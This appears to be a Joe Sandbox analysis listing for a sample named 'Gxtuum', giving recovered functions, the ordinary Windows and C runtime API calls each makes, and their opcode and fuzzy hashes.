Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: 92a630b7b23dd749aecc8e52797c5c9010fc7260048316e88b1ffa31eaa3ce00
Instruction ID: 51946bf4af9f1fdb60f0cc10d0708ed8e111091c67501ba572bd8d30fad8d74e
Opcode Fuzzy Hash: 92a630b7b23dd749aecc8e52797c5c9010fc7260048316e88b1ffa31eaa3ce00
Instruction Fuzzy Hash: 00B1397590161ADFDB28DF18C884AEDB3B5FF58304F5085AAE849A7290E771AED0CF40

Function 001158D5 Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001187D5: RtlAllocateHeap.NTDLL(00000000,00100FD7,?,?,0010A1C2,00100FD7,?,001037BE,8B18EC84,74DF0F00), ref: 00118807

_free.LIBCMT ref: 001159E4
_free.LIBCMT ref: 001159FB
_free.LIBCMT ref: 00115A18
_free.LIBCMT ref: 00115A33
_free.LIBCMT ref: 00115A4A

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: f73a2a72c39d4b527f840937e3dc6b6c80c2a855b3dc22364f5a5da06cce6af1
Instruction ID: 8b17ba3761a40a20a38da10916b4ea71081da0c28e9052c55f39dbd69bcce02f
Opcode Fuzzy Hash: f73a2a72c39d4b527f840937e3dc6b6c80c2a855b3dc22364f5a5da06cce6af1
Instruction Fuzzy Hash: A6510431A00708EFDB29DF69DC81AAAB3F6EF94724F004679E405D7251E731EA818B50

Function 00107500 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00107689
__Mtx_unlock.LIBCPMT ref: 0010769A
__Cnd_broadcast.LIBCPMT ref: 001076C0
__Mtx_unlock.LIBCPMT ref: 001076C6
Concurrency::cancel_current_task.LIBCPMT ref: 0010770F

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
String ID:
API String ID: 3354401312-0
Opcode ID: 4f38d947dd8aead6afb7d70760b13691caef8b1a333a5b739891306ddd75e9c8
Instruction ID: bf3c2a2986b4e433c90e86415bfc079f80682a7175fcaef0c03bb4692545e78e
Opcode Fuzzy Hash: 4f38d947dd8aead6afb7d70760b13691caef8b1a333a5b739891306ddd75e9c8
Instruction Fuzzy Hash: 62617AB0D05209DFDB14DFA4C954BAEBBB8BF05304F104169E845AB382DBB5AA05CFA0

Function 000EF4B0 Relevance: 7.7, APIs: 5, Instructions: 159comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 000EF547
CoCreateInstance.OLE32(0013DFEC,00000000,00000001,0013E04C,?), ref: 000EF563
CoUninitialize.OLE32 ref: 000EF571
CoUninitialize.OLE32 ref: 000EF630
CoUninitialize.OLE32 ref: 000EF644

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: Uninitialize$CreateInitializeInstance
String ID:
API String ID: 1968832861-0
Opcode ID: 250630df70634cc582c4dec984024b2a5c50f0189e4c41627e5fae1668a86df8
Instruction ID: 10cba4754c021b1bd1e8b0dc52726eeb8899c629f7eb18d139f77193d54eb9a0
Opcode Fuzzy Hash: 250630df70634cc582c4dec984024b2a5c50f0189e4c41627e5fae1668a86df8
Instruction Fuzzy Hash: 6E51A071A00249AFDB04DF65D888BEEBBB9EF58314F508129F505F7690D775A940CBA0

Function 00105300 Relevance: 7.6, APIs: 5, Instructions: 107COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00105336
std::_Lockit::_Lockit.LIBCPMT ref: 00105356
std::_Lockit::~_Lockit.LIBCPMT ref: 00105376
std::_Facet_Register.LIBCPMT ref: 00105411
std::_Lockit::~_Lockit.LIBCPMT ref: 00105429

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 958ab25e982f1fa982d90f163a99acf6de8f80cec36994f3491fd0a9049be62d
Instruction ID: 5c47ffdc3bc80415db7d80dfaff98fb4109c58f0514668b30f5c2923fe6a5cd5
Opcode Fuzzy Hash: 958ab25e982f1fa982d90f163a99acf6de8f80cec36994f3491fd0a9049be62d
Instruction Fuzzy Hash: 1F41DB71A046148BCB24DF94D891BAFB7B1FB10750F14416DE885AB2D2DBB0AD41CFC0

Function 001212AB Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001212C3

Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE

_free.LIBCMT ref: 001212D5
_free.LIBCMT ref: 001212E7
_free.LIBCMT ref: 001212F9
_free.LIBCMT ref: 0012130B

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 57c3080107bfd6484526c6dc4c0b97262882e65fdfd59cad3f49b8994cab46f8
Instruction ID: 40c2ab29af0652240c3ab8723107d59f5a7215e96ea344e2803d8fa996e69510
Opcode Fuzzy Hash: 57c3080107bfd6484526c6dc4c0b97262882e65fdfd59cad3f49b8994cab46f8
Instruction Fuzzy Hash: 2DF0FF32504710B7C668DB65F8C1C9AB3EAEBA27247644815F008E7A11CB64FCD04664

Function 000E4910 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 000E499F

Part of subcall function 0010B446: RaiseException.KERNEL32(E06D7363,00000001,00000003,000E25DC,00100FD7,8B18EC83,?,000E25DC,?,0014458C), ref: 0010B4A6

Strings

ios_base::eofbit set, xrefs: 000E4954
ios_base::badbit set, xrefs: 000E4945
ios_base::failbit set, xrefs: 000E494F

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: e3c121aeb13608bdafdc4641c36b4d9f5072d16cc31d4b1e0e6409ee0e3e3264
Instruction ID: 846e26d5a2fd8925943d3f2320ee7275e11263505f9480d6d21ffe2b15cf7c1b
Opcode Fuzzy Hash: e3c121aeb13608bdafdc4641c36b4d9f5072d16cc31d4b1e0e6409ee0e3e3264
Instruction Fuzzy Hash: 111138B1600744AFC710DF59C942B97B7ECEF51310F14852AF865BB682EBB0E914CB91

Function 001195B5 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0011963F

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: a747bd915aba6517dd4d41587f6b2d132dafeedf1d0584c430e1709dc9ca69dd
Instruction ID: 01b1fa65dc316c254c0790501d370e3f2fd7fcbdf83ec27eb9505082b9956c75
Opcode Fuzzy Hash: a747bd915aba6517dd4d41587f6b2d132dafeedf1d0584c430e1709dc9ca69dd
Instruction Fuzzy Hash: 36B147729002859FDB19CF68C8A1BFEBBE5EF55300F15407AE865DB281D7348D81CB60

Function 0010CEBB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0010CF82
___AdjustPointer.LIBCMT ref: 0010CFA5
___AdjustPointer.LIBCMT ref: 0010D041

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: f40b26d4a41e4589533aa807de5d32cc193b8c5ad9d7bf9552e9cccfd2bbe2db
Instruction ID: a5923b7cfc2afc90f983661ba7d73fd6d8d74e19b643899eda53915f1eb4d227
Opcode Fuzzy Hash: f40b26d4a41e4589533aa807de5d32cc193b8c5ad9d7bf9552e9cccfd2bbe2db
Instruction Fuzzy Hash: CA51E172605207AFDB289F50D881BAAB7A6FF14700F244229F885972E1D7B1ED41CFD1

Function 00106210 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 001062E7
std::_Rethrow_future_exception.LIBCPMT ref: 00106339
std::_Rethrow_future_exception.LIBCPMT ref: 00106349

Part of subcall function 000E3A60: __Mtx_unlock.LIBCPMT ref: 000E3B54

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: Mtx_unlockRethrow_future_exceptionstd::_
String ID:
API String ID: 3298230783-0
Opcode ID: e27565234d5db964981988c508b331e12ee59b7fbc89393706a6740dac274376
Instruction ID: e32fe690e370cc555eb649cf8d4d71c2e879b554a2a1d7c2794849c83b0efb80
Opcode Fuzzy Hash: e27565234d5db964981988c508b331e12ee59b7fbc89393706a6740dac274376
Instruction Fuzzy Hash: B4411B71D043489FCB14EBA4D842BAFBBF8AF15300F04456DF5C667682EBB1A954C7A2

Function 0012757E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0012764E
_free.LIBCMT ref: 00127677
SetEndOfFile.KERNEL32(00000000,00123DDD,00000000,00124074,?,?,?,?,?,?,?,00123DDD,00124074,00000000), ref: 001276A9
GetLastError.KERNEL32(?,?,?,?,?,?,?,00123DDD,00124074,00000000,?,?,?,?,00000000), ref: 001276C5

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: a1424fc753bcac3fd48575eaa8a495f3e1b04fd1c94920ffb4e4c12d917f9bd1
Instruction ID: cc91060b48bd517ffa1f3f39da9b4a0dc287580d4606065f092639bd75e8f755
Opcode Fuzzy Hash: a1424fc753bcac3fd48575eaa8a495f3e1b04fd1c94920ffb4e4c12d917f9bd1
Instruction Fuzzy Hash: 2F41EB72904A11ABEB196BBCEC46BDF7B75EF64360F150524F924E72D1DB30C8A08761

Function 0010EEA6 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 303d7667110cba0a3964292dbf3e1d73f80d028eb66571999716b7754368d73a
Instruction ID: b53bc83b5615dc4c73a9f20fbb01cf9fc5d2f354a7238341a6ce718b0dc673bf
Opcode Fuzzy Hash: 303d7667110cba0a3964292dbf3e1d73f80d028eb66571999716b7754368d73a
Instruction Fuzzy Hash: 0B41C871A00755AFE724AF39CC41B9ABBE9EB98710F10892EF151DB2C1D7B1A9418790

Function 000E2F00 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 000E2F9F
GetCurrentThreadId.KERNEL32 ref: 000E2FAB
__Mtx_unlock.LIBCPMT ref: 000E2FF2
__Cnd_broadcast.LIBCPMT ref: 000E2FFB

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: Mtx_unlock$Cnd_broadcastCurrentThread
String ID:
API String ID: 3264154886-0
Opcode ID: 3319c8ec9d977d2647e5bbb655a44da40d7d0afce8ae3f6f89be2d638c4c3e8b
Instruction ID: fa1c9ae8dc4ef389e07ba0a4715b50c144d7b6d32d5a31cf407337ac83f1f98a
Opcode Fuzzy Hash: 3319c8ec9d977d2647e5bbb655a44da40d7d0afce8ae3f6f89be2d638c4c3e8b
Instruction Fuzzy Hash: 7541CCB1A016159FCB15DB35C844B5ABBE8FF29310F004539E85AD7791EB71EA00CBC1

Function 0011F3A3 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 0010ED48: _free.LIBCMT ref: 0010ED56

Part of subcall function 0011E84F: WideCharToMultiByte.KERNEL32(00000000,00000000,8B18EC83,?,00000000,8B18EC83,001184E7,0000FDE9,8B18EC83,?,?,?,00118260,0000FDE9,00000000,?), ref: 0011E8FB

GetLastError.KERNEL32 ref: 0011F40B
__dosmaperr.LIBCMT ref: 0011F412
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0011F451
__dosmaperr.LIBCMT ref: 0011F458

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: b5dd32a7f6723a5a64753abc66c2d9454aed730034f71be52b0681b1b3a23056
Instruction ID: 2519a72800777708db05bd45e726568234723f72255af1eaecbabe9360fffb61
Opcode Fuzzy Hash: b5dd32a7f6723a5a64753abc66c2d9454aed730034f71be52b0681b1b3a23056
Instruction Fuzzy Hash: E721B071600219BF9B28AF668C809EBB7A8EF10364714853DF96997550DB31ECC1C760

Function 001171C0 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,?,00117FA7,?,00000000,00000000,?,00118461,00000000,00000000,00000000,00000000,8B18EC83,00144218,00000010), ref: 001171C5
_free.LIBCMT ref: 00117222
_free.LIBCMT ref: 00117258
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00118461,00000000,00000000,00000000,00000000,8B18EC83,00144218,00000010,00111502,00000000,00000000,00000000), ref: 00117263

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 74ef48cd130f7ebab0b2fd09f384525e8e8303748d863df6e2d38fc8b956bdb8
Instruction ID: 6cedb3d341b795c08f1ba0de6337a1556594f02c89d8c4516513307c4e2bb3ba
Opcode Fuzzy Hash: 74ef48cd130f7ebab0b2fd09f384525e8e8303748d863df6e2d38fc8b956bdb8
Instruction Fuzzy Hash: 2811A33220C2017BDB5D26B4AC81EEB297A9BE37747250735F524966F1DF66CCC28111

Function 00108458 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 001083B9: GetModuleHandleExW.KERNEL32(00000002,00000000,00000000,?,?,0010840B,00000014,?,0010844C,00000014,?,000E2D32,00000000,00000014,00000000,455139FB), ref: 001083C5

__Mtx_unlock.LIBCPMT ref: 0010849E
FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,455139FB,?,?,?,Function_00048C80,000000FF), ref: 001084C6
__Mtx_unlock.LIBCPMT ref: 00108501
__Cnd_broadcast.LIBCPMT ref: 00108512

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
String ID:
API String ID: 420990631-0
Opcode ID: f40790e9c1958ac6bd048e86cb0bc7c6c82f50e9c4829344d1d69e1da59344b6
Instruction ID: c2bb85020cefce62641b22f8cebe3d81004edb007d4a1bb1f73f5a8b5f47f36e
Opcode Fuzzy Hash: f40790e9c1958ac6bd048e86cb0bc7c6c82f50e9c4829344d1d69e1da59344b6
Instruction Fuzzy Hash: B911E976508600ABCA117B65EC12B5F7BA8FB51B20F00481AF9C5E76E3DFB5D840C6A0

Function 00117317 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00100FD7,00100FD7,8B18EC83,00111657,00118818,?,?,0010A1C2,00100FD7,?,001037BE,8B18EC84,74DF0F00), ref: 0011731C
_free.LIBCMT ref: 00117379
_free.LIBCMT ref: 001173AF
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0010A1C2,00100FD7,?,001037BE,8B18EC84,74DF0F00), ref: 001173BA

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: f416d3958c0e8afd1bc4bfc69e55b401734d70257f3bab19035b752fb743fd13
Instruction ID: 650df2c772ed50ac7aa94581746e03e90f8293cb4080893dc4d474f4b90a7816
Opcode Fuzzy Hash: f416d3958c0e8afd1bc4bfc69e55b401734d70257f3bab19035b752fb743fd13
Instruction Fuzzy Hash: B41186362186017BDB5D26B9AC81EEB256AABE27747250334F935D32F1DF61CCC16121

Function 0011A28F Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,00125D87,?,?,?,00000020,00000001), ref: 0011A2A5
GetLastError.KERNEL32(?,00125D87,?,?,?,00000020,00000001), ref: 0011A2AF
__dosmaperr.LIBCMT ref: 0011A2B6

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 9f02b3e05bc38e6e49dd532b641757e0b972d205230da9db40fe52fe9f050a85
Instruction ID: ac81fe219bc3305816dd828c466c8ad27c13f306ee26b6485776db3299325709
Opcode Fuzzy Hash: 9f02b3e05bc38e6e49dd532b641757e0b972d205230da9db40fe52fe9f050a85
Instruction Fuzzy Hash: D1F06D32201115BBCB282BA6DC089CAFF69FF457A03458120F619D7420DB32E8D0D7D1

Function 0011A2F8 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,00125D12,?,?,?,?,00000020,00000001), ref: 0011A30E
GetLastError.KERNEL32(?,00125D12,?,?,?,?,00000020,00000001), ref: 0011A318
__dosmaperr.LIBCMT ref: 0011A31F

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: f497c28a40161774f497d7e9fc5e1d04501e199878cfc252af500870b248c376
Instruction ID: 35c6b7208746c8cf27528781a3b49847b3170406726f086c83d59a812099841b
Opcode Fuzzy Hash: f497c28a40161774f497d7e9fc5e1d04501e199878cfc252af500870b248c376
Instruction Fuzzy Hash: 87F01D32601115BBCB295FA6DC08ADAFF69FF447A03598531F629D7420DB31E890DBD1

Function 001278EA Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,00000000,?,001243D2,00000000,00000001,00000000,00000000,?,00117F36,?,?,00000000), ref: 00127901
